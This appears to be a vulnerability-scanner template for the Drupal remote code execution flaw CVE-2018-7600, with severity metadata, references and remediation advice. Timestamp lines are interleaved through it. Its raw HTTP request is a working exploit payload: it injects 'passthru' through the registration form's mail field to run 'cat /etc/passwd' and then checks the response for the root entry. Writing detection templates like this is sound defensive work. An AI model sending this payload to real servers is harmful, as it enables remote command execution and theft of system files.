2021-02-15 13:33:33 +00:00
id : CVE-2018-7600
info :
2022-05-13 20:26:43 +00:00
name : Drupal - Remote Code Execution
2021-02-15 13:33:33 +00:00
author : pikpikcu
severity : critical
2022-05-13 20:26:43 +00:00
description : Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
2022-05-17 09:18:12 +00:00
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1040598
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-7600
cwe-id : CWE-20
2023-10-23 12:22:20 +00:00
epss-score : 0.97555
2023-11-09 06:04:52 +00:00
epss-percentile : 0.99995
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
2022-07-07 06:45:53 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : drupal
product : drupal
2023-09-06 12:57:14 +00:00
shodan-query : http.component:"drupal"
2023-07-12 11:56:50 +00:00
tags : cve,cve2018,drupal,rce,kev,vulhub,intrusive
2021-02-15 13:33:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-15 13:33:33 +00:00
- raw :
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Referer : {{Hostname}}/user/register
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="_drupal_ajax"
matchers-condition : and
matchers :
- type : word
part : header
2023-07-11 19:49:27 +00:00
words :
- application/json
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2021-02-15 13:33:33 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : status
status :
- 200
2023-11-09 08:56:13 +00:00
# digest: 4a0a00473045022012abc4e8f9f45fa4dec5d3f4208be8ad08505309d907e294ad9f987dc8949924022100a16a14e83b4ecc616e9d11686be7bb63d5c07a5783b1c0ec91a8bfd64a43ee4e:922c64590222798bb761d5b6d8e72950